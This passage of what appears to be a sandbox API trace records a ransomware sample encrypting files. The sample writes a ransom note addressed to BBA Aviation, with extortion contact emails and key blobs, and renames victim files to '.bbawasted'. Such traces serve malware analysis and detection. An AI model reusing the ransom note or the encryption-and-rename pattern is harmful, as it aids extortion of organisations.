dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0161.404] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0161.405] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xbe6 [0161.405] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbe6) returned 0x650000 [0161.405] CloseHandle (hObject=0x290) returned 1 [0161.407] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0161.407] CloseHandle (hObject=0x294) returned 1 [0161.407] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.407] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0161.408] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.408] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.408] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0161.409] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0161.409] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.418] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kYtwTaur2pSJhkkspksDk6qK4FjSdm/JyDkubyL6pt2kmPl5rJEyug6Prlg4thIQ\r\ndg3Oj97dXRrUxIh+1izrMc0+n+sR1qaC5Mz3kMIB2/n3W548r5FLNhz3ZYpjUpxm\r\n32i2F+rO2Z8EL6BhPUH+/m0R7RLyz9RNvkvs5f81agUyLSV+3tSh5k38G8eRd4yG\r\ndhdBQzI2IjAzZucva9Z7+rC/ydZebcD1VrKpoc0i98RdFKrUpYKZePcp4UNwDlwq\r\nvDBH+wXrGbgUSG0y1i4fqnz4yM2OxDo9CFLbrLOPxa9cvyo46QrBg+0WtovC5Mkj\r\n+Yhdm92tETry+Q4MFoRaExoTsxn9tWEtcXJJZ6xwkws0j9Ok8kx/iF3TSCdO9Sx+\r\njad7OiREa7kyPwUpSO2Y32SbNhH9cS7reXUIntcqvJmhThf+XwA7C2B3XAFeiN+8\r\nZaKeJYzXi6EHmfoT5PS/K82v64t+ysnzmUusf+a3JqXwtHBLAIVy77NPRx88lkAf\r\n7n0XW1hASBRXRdk1T9l7B4e1e6ah0LtkFmjI1K0rVskvMQOkKmU5yQYbQZutPuo2\r\nRSEPneMeStCBjhdI+B9sCDy/6N1w1ioV+RAsORERsz9bWfoeFfyMECVMw4oL0cTS\r\n6kMwOYOOdB79lUSgG40qsoziExFbmDZQxRa8tpnSPED=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.418] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0161.418] SetEndOfFile (hFile=0x288) returned 1 [0161.421] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.421] CloseHandle (hObject=0x288) returned 1 [0161.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0161.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a25c0 | out: hHeap=0x660000) returned 1 [0161.608] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0161.609] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0161.609] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0161.609] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 39 [0161.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0161.609] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.609] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0161.610] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.610] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.610] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0161.613] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.614] SetEndOfFile (hFile=0x288) returned 1 [0161.614] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.614] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.bbawasted")) returned 1 [0161.615] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0161.615] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0161.616] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xfc8 [0161.616] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfc8) returned 0x650000 [0161.616] CloseHandle (hObject=0x294) returned 1 [0161.620] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0161.620] CloseHandle (hObject=0x290) returned 1 [0161.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.620] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0161.621] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.621] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.621] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0161.622] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0161.622] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.633] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]MYFyzunmyE7uZSCzq2DhC6Vox7g8UgxUV+p0qMyMMn7ycVVqHgr3bgdTtFbwAjuU\r\nj5kXMXqdUXJYMo0ICdwhl6C9fP3uf6dXyOwXnodK65bTnVxMoGeoQY3byRYzilzn\r\njcf4qoSH1gzdfZ1yv8QfSJRmZYiRNii1CkrmepVQ9hVEWA3Jhcip1/MoQRvE6xpg\r\nY2Yf+97RfLwiWpLLbs/NiFeliKM7jUK8XXqZ77Mi3eFnGh05J1e8qhhxboSH6yi5\r\nEb6F7nFFcDXombnh39aAwxi4+d9F+VoonRWJHtGZDQnhLX17aJrEJaIPwRrQBi1Z\r\n+G9dcqnsxNcwpgfKJRKj43Qs5OU6xxfm2ft6TF4TLxpEHdwurXCEqHfHJcQBjpCz\r\n5JTAXZcYoK8jYCxkQfkSPr7kDQ0YhkaaoASRtqUcive77VX8pR8JOnGyPkUovKON\r\nWBuGZLF0ki4jGActD2MO3m3AGrQOpxb08+4gpCK6AKKKux6H+q6ZHAzOwkjXGbmy\r\n7hJfTlqV1SAaePqHFsscOb7xtUERGltWnHTSBeE8zXRNUdZw3KV8l2N4M13HeyE9\r\nX9arYeek8vsk59+58859uImB+P9+wdfmlJgY6UyeZgNWUirv2ybEDT68S69JxWjL\r\n3mWYmEv6xMlN8YXsu4Ojso+H5q/pKG8AXOP/ubE+j4g=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.633] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0161.633] SetEndOfFile (hFile=0x288) returned 1 [0161.636] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.636] CloseHandle (hObject=0x288) returned 1 [0161.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0161.638] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2a80 | out: hHeap=0x660000) returned 1 [0161.638] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0161.639] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0161.639] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0161.639] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 48 [0161.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6aecf0 [0161.639] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.639] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef68) returned 1 [0161.640] CryptGenRandom (in: hProv=0x6aef68, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.640] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.640] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0161.641] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.642] SetEndOfFile (hFile=0x288) returned 1 [0161.642] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.642] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.642] lstrcpyW (in: lpString1=0x6aed50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.bbawasted")) returned 1 [0161.643] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0161.643] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0161.643] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x141c6 [0161.643] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x141c6) returned 0xd80000 [0161.644] CloseHandle (hObject=0x290) returned 1 [0161.754] UnmapViewOfFile (lpBaseAddress=0xd80000) returned 1 [0161.793] CloseHandle (hObject=0x294) returned 1 [0161.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.793] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef68) returned 1 [0161.794] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.794] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.794] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef68) returned 1 [0161.794] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0161.794] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.806] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GxtACuBkYhJ/IiwQFA1y2pwerV9+OPIymxYqrvvXSRLvsvXkCBivCDPL52QM25bJ\r\nFQ/Z84DWfQW2hrt3MB2Q/wz3jGorED6TZ7BDCZh95Uyd+PFOAU3ylLbAbEZrpD7L\r\nm+xzBCSr/+g91w/H1lP/L2Fjzt3n0b7lrlTaRpRAiUhOJ57uA46+AsI7PFbjOo8d\r\ng5ijU+ibGrfkhwXHwX4/JgVBTJYPnDweoLTME+UCWLx+d/D8on1vSHXPynVLjiCa\r\nGBajrZdVy2tM180fD8y/JmzsrAWKgl1qZMnFBog6mY8Mh8XP46C4DaLM6r3mUXjw\r\nYJ+Wjf+vb1F3zpri3GBU4a7/IXsaqNmj9EZWniUl78ycXyMrA+Pq3OvqFNJnSOvr\r\nlg244WX0HxPOfgghyISZIRROMlozyRdZ4dMfDaY+yMo9k4rePwgIgOBRO4GnUU+D\r\nMlj/dr2mDCGlZFEyO0grI84WvZR9AHHfui+dRwoZjT/ZF8VrlIcLuo/EHmxOekjg\r\nhiZHxy2SY9idhSS6fEY5AlflhDo8GXHAMvmSufokVDsq4jdrdgqpd+atddTQm+FJ\r\ncD6aaGZyv6NMkUH2To8XMzmRXNzojEtnvo7PHFClY9bcjqgSK3PpPJYpN8gXSrfu\r\nQgtuX0jCC/cJTpmvun+aht9mURGNhO7q5cr2MpdXumt=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.806] WriteFile (in: hFile=0x288, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0161.806] SetEndOfFile (hFile=0x288) returned 1 [0161.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.809] CloseHandle (hObject=0x288) returned 1 [0161.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0161.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a16b8 | out: hHeap=0x660000) returned 1 [0161.816] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0161.817] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0161.817] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0161.817] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 39 [0161.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0161.817] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.817] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6aef50) returned 1 [0161.818] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.818] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.818] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0161.820] WriteFile (in: hFile=0x290, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.822] SetEndOfFile (hFile=0x290) returned 1 [0161.822] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.822] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.822] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.bbawasted")) returned 1 [0161.823] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0161.823] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0161.824] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xd4b8 [0161.824] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd4b8) returned 0x650000 [0161.824] CloseHandle (hObject=0x288) returned 1 [0161.874] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0161.875] CloseHandle (hObject=0x294) returned 1 [0161.875] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.875] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6aef50) returned 1 [0161.875] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.875] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.876] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6aef50) returned 1 [0161.876] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0161.876] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.887] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.887] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 